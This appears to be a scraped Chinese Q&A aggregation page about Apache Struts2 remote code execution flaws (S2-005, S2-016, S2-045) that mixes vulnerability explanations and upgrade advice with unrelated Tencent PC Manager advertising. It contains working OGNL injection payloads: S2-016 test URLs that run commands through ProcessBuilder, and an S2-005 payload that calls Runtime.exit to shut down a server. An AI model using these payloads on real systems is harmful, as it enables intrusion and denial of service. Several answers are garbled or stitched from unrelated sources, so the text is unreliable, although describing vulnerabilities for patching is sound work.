struts2漏洞poc分析,【漏洞分析】【struts2】【s2-005】远程命令执行

struts2漏洞poc分析,【漏洞分析】【struts2】【s2-005】远程命令执行详细介绍

本文目录一览： 如何用poc验证一个网站存在struts漏洞

点击系统上的腾讯电脑管家应用程序界面，在主界面中，点击修复漏洞按钮
在漏洞修复界面中，展出可以安装的修复程序列表，如果简单的话，可以直接点击右侧的一键修复按钮
点击漏洞修复界面中的，已安装，就会返回已经安装的漏洞修复程序列表
点击右上方的设置按钮，进行漏洞修复设置
在设置界面中，可以设置程序的安装和修复方式，需要提醒自己，然后进行修复操作

struts2漏洞是什么

1. Struts2的重定向漏洞
根据Apache给出的漏洞修复方案，只是升级了jar包版本2.3.16
升级完成后所有页面访问都出现了404，如下bug：
There is no Action mapped for namespace [/] and action name [XX!XX] associated with context path....
解决办法：当时好像使用了Dynamic Method Invocation 动态方法调用，然后Struts.xml文件都修改了通配符和占位符匹配。
2. Struts2 OGNL的高危漏洞S-045
Struts使用的Jakarta解析文件上传请求包不当，当远程攻击者构造恶意的Content-Type，可能导致远程命令执行。
针对此问题做出如下修改：
(1)根据Apache给出的漏洞修复方案，升级Struts2相关jar到2.3.32
(2)关于上传文件部分做出如下验证
<1>上传文件非空验证；
<2>上传文件格式验证；
<3>上传文件验证MimeType；
<4>文件是否可被修改高宽或裁剪(本次项目上传完文件为图片)
<5>文件保存路径重命名。
学习java知识，推荐北京尚学堂，我们拥有多年编程培训经验，会让你在学习的时候快人一步！

【漏洞分析】【struts2】【s2-005】远程命令执行

可以去目标机器上查询到文件已经创建成功
unicode编码
\u0023 "#"
\u003d "="
最后生效的payload

原始POC

原始POC，分行显示，易于理解

直接使用的payload

带回显的payload: https://www.cnblogs.com/leaf-7/p/5509527.html
https://github.com/vulhub/vulhub/tree/master/struts2/s2-005

如何看待Struts2远程代码执行漏洞的危害

建议腾讯电脑管家修复，系统漏洞经常被黑客利用传播恶意程序（如网页挂马），必须及时修复系统漏洞才能有效防止计算机在上网时被黑客入侵，不过如果安装了安全软件，并且漏洞介绍看起来不是那么严重的话，可以选择不修复。
Windows系统漏洞是指操作系统在开发过程中存在的技术缺陷，这些缺陷可能导致其他用户在未被授权的情况下非法访问或攻击计算机系统。因此，系统开发商一般每月都会发布最新的补丁用以修复新发现的漏洞。目前，腾讯电脑管家支持修复Windows操作系统漏洞和部分第三方软件漏洞。
我们知道这个漏洞是Struts2默认解析上传文件的Content-Type头的过程中出现的问题。struts2如果解析这个头出错，就会执行错误信息中的OGNL代码。该漏洞危害非常大，而且利用成功率高甚至不需要找上传点，自己构造上传包就可以利用，进行远程命令执行。权限自然也基本上属于服务权限，因为你的命令代码是web服务器帮你执行的，它有啥权限，你也就有啥权限。

没有用struts2也会报apache struts2 远程代码执行漏洞这个漏洞，怎么处理

漏洞产生原因主要在于，Struts2 的标签库使用 OGNL 表达式来访问 ActionContext 中的对象数据，为了能够访问到 ActionContext 中的变量，Struts2 将 ActionContext 设置为 OGNL 的上下文，并将 OGNL 的跟对象加入 ActionContext 中。
看看你的架包中是否有带struts2的
Apache Struts2作为世界上最流行的Java Web服务器框架之一，3月7日带来了本年度第一个高危漏洞——CVE编号CVE-2017-5638。其原因是由于Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞，攻击者可以在使用该插件上传文件时，修改HTTP请求头中的Content-Type值来触发该漏洞，导致远程执行代码。
可以在腾讯智慧安全页面申请使用腾讯御点
然后使用这个软件上面的修复漏洞功能
直接对电脑的漏洞进行检测和修复就可以了

如何检测struts代码执行漏洞

漏洞描述:
CVE-2013-225. Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物
Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式，并将用户通过URL提交的内容拼接入Ognl表达式中，从而造成攻击者可以通过构造恶意URL来执行任意Java代码，进而可执行任意命令
redirect:和redirectAction:此两项前缀为Struts默认开启功能，目前Struts 2.3.15.1以下版本均存在此漏洞
目前Apache Struts2已经在2.3.15.1中修补了这一漏洞。强烈建议Apache Struts2用户检查您是否受此问题影响，并尽快升级到最新版本
< 参考
1. http://struts.apache.org/release/2.3.x/docs/s2-016.html
>
测试方法:
@Sebug.net dis 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
由于Apache Struts2 在最新修补版本2.3.15.1中已经禁用了重定向参数，因此只要重定向功能仍然有效，则说明受此漏洞影响：
http://host/struts2-showcase/employee/save.action?redirect:http://www.yahoo.com/
如果页面重定向到www.yahoo.com，则表明当前系统受此漏洞影响。
验证表达式解析和命令执行：
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}`
Sebug安全建议:
厂商状态：
厂商已经发布Apache Struts 2.3.15.1以修复此安全漏洞，建议Struts用户及时升级到最新版本。
厂商安全公告：S2-01. 链接：http://struts.apache.org/release/2.3.x/docs/s2-016.html
软件升级页面：http://struts.apache.org/download.cgi#struts23151
目前存在漏洞的公司
乌云上，已经发布了快60个struts的这个漏洞问题，包括腾讯，百度，网易，京东等国内各大互联网公司。（http://www.wooyun.org/bugs/new_submit/）
解决办法：
升级到Struts 2.3.15.1（强烈建议）
使用ServletFilter来过滤有问题的参数（临时替换方案）
参考资料:

这次struts爆出来的漏洞,一大片的网站受的影响,影响最严重的就是电商了.对于struts的漏洞,曾经也写过struts2代码执行漏洞,struts2自从使用OGNL表达式的方式后,经常就会报出一些可怕的漏洞出来,建议那些还是struts的童鞋们,学习一些其他的框架吧!比如,spring mvc,简单,好用,高效!

struts2 漏洞 怎么防范

可以用腾讯电脑管家，修复漏洞，强大智能的漏洞修复工具，
通过电脑管家提供的修复和优化操作，能够消除风险和优化计算机的性能。
电脑管家建议您每周体检一次，这样可以大大降低被木马入侵的风险。
修补方案：
升级到Struts 2.3.32或Struts 2.5.10.1
Struts 2.3.32下载地址：
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32

使用Struts2的原因是什么？

因为Struts2比Struts1更加的简单，不需要依赖其他的软件，属于无入侵式设计。
Struts2的介绍：
1、Struts 2是Struts的下一代产品，是在WebWork的技术基础上开发了全新MVC框架。虽然Struts2号称是一个全新的框架，但这仅仅是相对Struts1而言。Struts2与Struts1相比，确实有很多革命性的改进。
2、Struts 2以WebWork为核心，采用拦截器的机制来处理用户的请求，这样的设计也使得业务逻辑控制器能够与ServletAPI完全脱离开，所以Struts 2可以理解为WebWork的更新产品。虽然从Struts 1到Struts 2有着太大的变化，但是相对于WebWork，Struts 2的变化很小。
3、Struts和Webwork同为服务于Web的一种MVC框架，从某种程度上看，Struts2是从WebWork2上升级得到的。甚至Apache的官方文档也讲：WebWork2到Struts2是平滑的过渡。我们甚至也可以说Struts2就是WebWork2.3而已。
4、Struts2曝出2个高危安全漏洞，一个是使用缩写的导航参数前缀时的远程代码执行漏洞，另一个是使用缩写的重定向参数前缀时的开放式重定向漏洞。这些漏洞可使黑客取得网站服务器的“最高权限”，从而使企业服务器变成黑客手中的“肉鸡”。

如何查看apache是否存在struts2 漏洞

建议开启防火墙，然后修复漏洞
试试腾讯电脑管家，杀毒+管理2合1，还可以自动修复漏洞：第一时间发现并修复系统存在的高危漏洞，在不打扰您的情况下自动为系统打上漏洞补丁，轻轻松松将病毒木马拒之门外。自动修复漏洞 电脑管家可以在发现高危漏洞（仅包括高危漏洞，不包括其它漏洞）时，第一时间自动进行修复，无需用户参与，最大程度保证用户电脑安全。尤其适合老人、小孩或计算机初级水平用户使用

测试最新的struts2漏洞 以及怎么拿到shell

问题简单!种问题肯定Action请求路径问题或者边没配置升级版本导致Action请求仔细查看配置路径或者查查2.3版本请求路径特殊配置要求用纠结种问题没析试几路i经或者看看web.xml文件struts2滤器filter配置版本问题升级版本配置文件struts2配置版本信息肯定要跟着换
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
段代码运行低版本struts2项目亲测效获取应用action段代码粘贴于action比
localhost:8080/StrutsTest/goLogin.action确实让web应用服务关闭
网查资料知OGNL引擎代码转义
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
终结 java.lang.Runtime.getRuntime().exit(1);
求神详解转义代码运行流程具体执行程